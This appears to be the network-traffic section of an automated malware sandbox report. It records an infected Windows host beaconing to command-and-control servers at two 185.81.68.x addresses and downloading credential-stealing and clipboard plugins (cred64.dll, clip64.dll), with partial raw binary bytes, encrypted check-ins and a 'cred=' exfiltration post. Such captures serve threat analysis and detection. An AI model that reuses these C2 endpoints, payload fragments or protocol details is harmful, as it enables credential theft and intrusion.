                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:27.531460047 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:26 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                9192.168.2.549745185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:27.765964031 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:27.886140108 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:29.394916058 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:28 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                10192.168.2.549751185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:29.498703957 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:37:30.834966898 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:30 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                11192.168.2.549752185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:29.498817921 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:37:30.834928036 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:30 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                12192.168.2.549753185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:29.547888041 CET66OUTGET /7vhfjke3/Plugins/cred64.dll HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:30.873532057 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:30 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 18:53:38 GMT
                                                                                                                                                                ETag: "138c00-629173b693080"
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 1281024
                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 e5 c9 44 c2 84 a7 17 c2 84 a7 17 c2 84 a7 17 d6 ef a3 16 d6 84 a7 17 d6 ef a4 16 d2 84 a7 17 d6 ef a2 16 73 84 a7 17 90 f1 a2 16 86 84 a7 17 90 f1 a3 16 cd 84 a7 17 90 f1 a4 16 c8 84 a7 17 d6 ef a6 16 cf 84 a7 17 c2 84 a6 17 01 84 a7 17 0e f1 ae 16 c6 84 a7 17 0e f1 a7 16 c3 84 a7 17 0e f1 58 17 c3 84 a7 17 0e f1 a5 16 c3 84 a7 17 52 69 63 68 c2 84 a7 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 82 96 5a 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 c8 0f 00 00 38 04 00 00 00 00 00 c4 fa 0c 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$DsXRichPEdZg" 8P`~X~ `0lpp8.text `.rdata@@.dataD@.pdata`@@_RDATAt@@.rsrc v@@.relocl0x@B
                                                                                                                                                                Dec 13, 2024 01:37:30.873564959 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 41 b8 20 00 00 00 48 8d 15 07 63 11 00 48 8d
                                                                                                                                                                Data Ascii: H(A HcHcH,H(+H(A HbH03HlH(H(AHbH HH(H(A Hb
                                                                                                                                                                Dec 13, 2024 01:37:30.873615980 CET1236INData Raw: 48 8d 0d 70 be 12 00 e8 d3 0b 0c 00 48 8d 0d ec 8c 0f 00 48 83 c4 28 e9 9b e6 0c 00 cc cc cc 48 83 ec 28 41 b8 14 00 00 00 48 8d 15 c7 62 11 00 48 8d 0d 60 c3 12 00 e8 a3 0b 0c 00 48 8d 0d 2c 8d 0f 00 48 83 c4 28 e9 6b e6 0c 00 cc cc cc 48 83 ec
                                                                                                                                                                Data Ascii: HpHH(H(AHbH`H,H(kH(AHbHPsHlH(;H(AHbHCHH(H(A HbHpHH(H(E3HH
                                                                                                                                                                Dec 13, 2024 01:37:30.873665094 CET1236INData Raw: b8 28 00 00 00 48 8d 15 bf 60 11 00 48 8d 0d 50 bd 12 00 e8 f3 06 0c 00 48 8d 0d 6c 93 0f 00 48 83 c4 28 e9 bb e1 0c 00 cc cc cc 48 83 ec 28 41 b8 0c 00 00 00 48 8d 15 bf 60 11 00 48 8d 0d a0 c1 12 00 e8 c3 06 0c 00 48 8d 0d ac 93 0f 00 48 83 c4
                                                                                                                                                                Data Ascii: (H`HPHlH(H(AH`HHH(H(AH`HPHH([H(AH`HcH,H(+H(AH_`Hp3HlH(H(A
                                                                                                                                                                Dec 13, 2024 01:37:30.873701096 CET1236INData Raw: 0b dd 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 e7 5d 11 00 48 8d 0d f0 b4 12 00 e8 13 02 0c 00 48 8d 0d ec 99 0f 00 48 83 c4 28 e9 db dc 0c 00 cc cc cc 48 83 ec 28 41 b8 04 00 00 00 48 8d 15 bf 5d 11 00 48 8d 0d 40 bf 12 00 e8 e3 01
                                                                                                                                                                Data Ascii: H(AH]HHH(H(AH]H@H,H(H(AH]HHlH({H(AHo]HHH(KH(AHO]H0SHH(
                                                                                                                                                                Dec 13, 2024 01:37:30.873737097 CET1236INData Raw: 48 8d 0d 2c a0 0f 00 48 83 c4 28 e9 2b d8 0c 00 cc cc cc 48 83 ec 28 41 b8 34 00 00 00 48 8d 15 7f 5c 11 00 48 8d 0d 50 ba 12 00 e8 33 fd 0b 00 48 8d 0d 6c a0 0f 00 48 83 c4 28 e9 fb d7 0c 00 cc cc cc 48 83 ec 28 41 b8 28 00 00 00 48 8d 15 87 5c
                                                                                                                                                                Data Ascii: H,H(+H(A4H\HP3HlH(H(A(H\H HH(H(AH\HHH(H(A4Hg\H`H,H(kH(A(Ho\HPsH
                                                                                                                                                                Dec 13, 2024 01:37:30.873773098 CET1236INData Raw: 23 aa 12 00 e8 86 f8 0b 00 48 8d 0d 4f a9 0f 00 48 83 c4 28 e9 4e d3 0c 00 cc cc cc cc cc cc 48 8d 0d a9 a9 0f 00 e9 3c d3 0c 00 cc cc cc cc 48 83 ec 28 45 33 c0 48 8d 15 e2 b0 10 00 48 8d 0d e3 ae 12 00 e8 46 f8 0b 00 48 8d 0d ef a9 0f 00 48 83
                                                                                                                                                                Data Ascii: #HOH(NH<H(E3HHFHH(HIdH3fHPHPH@HPHPHHPHPH@ HP(HP8H@@HPHHPXH@`HPhHPxHHHH
                                                                                                                                                                Dec 13, 2024 01:37:30.873809099 CET1236INData Raw: 00 00 48 c7 80 80 02 00 00 0f 00 00 00 48 89 90 88 02 00 00 48 89 90 98 02 00 00 48 c7 80 a0 02 00 00 0f 00 00 00 48 89 90 a8 02 00 00 48 89 90 b8 02 00 00 48 c7 80 c0 02 00 00 0f 00 00 00 48 89 90 c8 02 00 00 48 89 90 d8 02 00 00 48 c7 80 e0 02
                                                                                                                                                                Data Ascii: HHHHHHHHHHH HHkdH3fHPHPH@HPHPHHPHPH@ HP(HP8H@@HPHHPXH@`HPhHPxHH
                                                                                                                                                                Dec 13, 2024 01:37:30.873868942 CET776INData Raw: c2 45 85 c0 7f d1 41 ff c8 45 85 c0 78 1e 41 0f b6 01 42 0f b6 8c 30 30 48 11 00 41 0f b6 02 42 0f b6 84 30 30 48 11 00 2b c8 75 04 48 83 c7 07 45 33 db 4c 8b d7 48 85 ff 75 05 45 8b d3 eb 19 44 38 1f 74 0a 66 90 49 ff c2 45 38 1a 75 f8 44 2b d7
                                                                                                                                                                Data Ascii: EAExAB00HAB00H+uHE3LHuED8tfIE8uD+A?AHL5@LAILEt+At#AB10HB820HuIIxAB00HAB00H+u.B0<Ft"AHA|3H\$ Hl$(Ht$
                                                                                                                                                                Dec 13, 2024 01:37:30.873908997 CET1236INData Raw: 12 00 0f af f7 03 f0 03 b5 bc 00 00 00 44 03 ee 8b 43 28 41 ff c4 49 83 c7 20 44 3b e0 7c a0 48 8b 6c 24 20 4c 8b 7c 24 28 4c 8b 64 24 58 41 8b fe 85 c0 7e 34 49 8b f6 0f 1f 80 00 00 00 00 48 8b 43 20 48 8b 4c 30 08 48 85 c9 74 11 44 38 71 11 74
                                                                                                                                                                Data Ascii: DC(AI D;|Hl$ L|$(Ld$XA~4IHC HL0HtD8qtiuAXH ;{(|E/Ll$PDuC(ADt$0~5IHC HL8HtD8qtAD8qu>XC(H ;|HL$0EH IHC Ht(H
                                                                                                                                                                Dec 13, 2024 01:37:30.993978024 CET1236INData Raw: 48 8d 4b 01 e8 a2 fe ff ff 83 f8 01 0f 85 7f 01 00 00 48 83 c3 03 80 3b 2e 75 65 0f b6 4b 01 42 f6 04 31 04 74 5a f2 0f 10 15 9d 58 11 00 48 ff c3 f2 0f 10 1d a2 58 11 00 f2 0f 10 25 b2 58 11 00 66 66 0f 1f 84 00 00 00 00 00 0f be c1 48 ff c3 f2
                                                                                                                                                                Data Ascii: HKH;.ueKB1tZXHX%XffHYYfnB0X\u^|$`D$dfnD$`FD$hfF)FXF B0tffCHB0u~-u+ukHD$pAHD


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                13192.168.2.549754185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:29.625463963 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:29.748852015 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:31.247997046 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:30 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                14192.168.2.549758185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:31.490396023 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:31.611481905 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:32.939009905 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:32 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                15192.168.2.549762185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:32.471972942 CET309OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:37:33.827222109 CET502INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:33 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 303
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 31 30 30 30 30 38 31 30 32 30 31 2b 2b 2b 38 33 63 30 64 38 32 31 35 34 33 30 62 66 62 62 35 31 63 62 32 66 64 33 33 30 37 63 39 36 62 30 63 62 33 31 63 34 66 36 64 33 66 62 64 65 36 32 62 32 66 65 61 34 38 33 23 31 30 30 30 30 38 32 30 31 30 31 2b 2b 2b 38 33 63 30 64 38 32 31 35 34 33 30 62 66 66 39 30 30 38 61 36 34 63 35 36 32 33 64 63 64 61 37 38 33 36 66 39 63 61 35 39 39 66 63 38 31 36 33 61 62 65 66 65 66 63 38 66 64 63 39 64 66 23 31 30 30 30 30 38 33 30 31 30 31 2b 2b 2b 38 33 63 30 64 38 32 31 35 34 33 30 62 66 66 39 30 30 38 61 36 34 63 35 36 32 33 64 63 64 61 37 38 33 36 66 39 63 61 35 39 39 66 63 38 31 36 33 61 62 65 66 65 66 63 38 66 64 63 39 64 66 23 31 30 30 30 30 38 34 30 31 30 31 2b 2b 2b 38 33 63 30 64 38 32 31 35 34 33 30 62 66 66 39 30 30 38 61 36 34 63 35 36 32 33 64 63 64 61 37 38 33 36 66 39 63 61 35 39 39 66 61 38 32 36 30 65 34 66 65 66 32 38 33 23 3c 64 3e
                                                                                                                                                                Data Ascii: <c>10000810201+++83c0d8215430bfbb51cb2fd3307c96b0cb31c4f6d3fbde62b2fea483#10000820101+++83c0d8215430bff9008a64c5623dcda7836f9ca599fc8163abefefc8fdc9df#10000830101+++83c0d8215430bff9008a64c5623dcda7836f9ca599fc8163abefefc8fdc9df#10000840101+++83c0d8215430bff9008a64c5623dcda7836f9ca599fa8260e4fef283#<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                16192.168.2.549761185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:32.472117901 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:37:33.820683956 CET746INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:33 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 547
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 55 6e 63 61 75 67 68 74 20 6d 79 73 71 6c 69 5f 73 71 6c 5f 65 78 63 65 70 74 69 6f 6e 3a 20 44 75 70 6c 69 63 61 74 65 20 65 6e 74 72 79 20 27 32 34 36 31 32 32 36 35 38 33 36 39 27 20 66 6f 72 20 6b 65 79 20 27 50 52 49 4d 41 52 59 27 20 69 6e 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 38 46 76 75 35 6a 68 34 44 62 53 5c 46 75 6e 63 74 69 6f 6e 73 2e 70 68 70 3a 31 35 31 0a 53 74 61 63 6b 20 74 72 61 63 65 3a 0a 23 30 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 38 46 76 75 35 6a 68 34 44 62 53 5c 46 75 6e 63 74 69 6f 6e 73 2e 70 68 70 28 31 35 31 29 3a 20 6d 79 73 71 6c 69 5f 71 75 65 72 79 28 4f 62 6a 65 63 74 28 6d 79 73 71 6c 69 29 2c 20 27 49 4e 53 45 52 54 20 49 4e 54 4f 20 60 75 6e 2e 2e 2e 27 29 0a 23 31 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 38 46 76 75 35 6a 68 34 44 62 53 5c 69 6e 64 65 78 2e 70 68 70 28 31 35 39 29 3a 20 41 64 64 54 6f 42 61 73 65 28 27 32 34 36 31 32 32 36 [TRUNCATED]
                                                                                                                                                                Data Ascii: <br /><b>Fatal error</b>: Uncaught mysqli_sql_exception: Duplicate entry '246122658369' for key 'PRIMARY' in C:\xampp\htdocs\8Fvu5jh4DbS\Functions.php:151Stack trace:#0 C:\xampp\htdocs\8Fvu5jh4DbS\Functions.php(151): mysqli_query(Object(mysqli), 'INSERT INTO `un...')#1 C:\xampp\htdocs\8Fvu5jh4DbS\index.php(159): AddToBase('246122658369', '0f3be6', '0', '5.10', 'User', 'x64', 'Windows 10', 'WinDefender', '927537', 'user', 'Workgroup', '1')#2 {main} thrown in <b>C:\xampp\htdocs\8Fvu5jh4DbS\Functions.php</b> on line <b>151</b><br />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                17192.168.2.549763185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:33.187673092 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:33.310187101 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:34.811338902 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:33 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                18192.168.2.549769185.81.68.147806664C:\Windows\System32\rundll32.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:34.738554001 CET173OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 21
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                                                                                                Data Ascii: id=246122658369&cred=
                                                                                                                                                                Dec 13, 2024 01:37:36.069933891 CET198INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:35 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 1
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                19192.168.2.549770185.81.68.147802164C:\Windows\System32\rundll32.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:34.845196009 CET173OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 21
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                                                                                                Data Ascii: id=246122658369&cred=
                                                                                                                                                                Dec 13, 2024 01:37:36.156397104 CET198INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:35 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 1
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                20192.168.2.549771185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:35.047310114 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:35.167045116 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:36.665479898 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:35 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                21192.168.2.549772185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:35.251979113 CET66OUTGET /7vhfjke3/Plugins/clip64.dll HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.578839064 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:35 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 18:53:40 GMT
                                                                                                                                                                ETag: "1f000-629173b87b500"
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 126976
                                                                                                                                                                Content-Type: application/x-msdownload
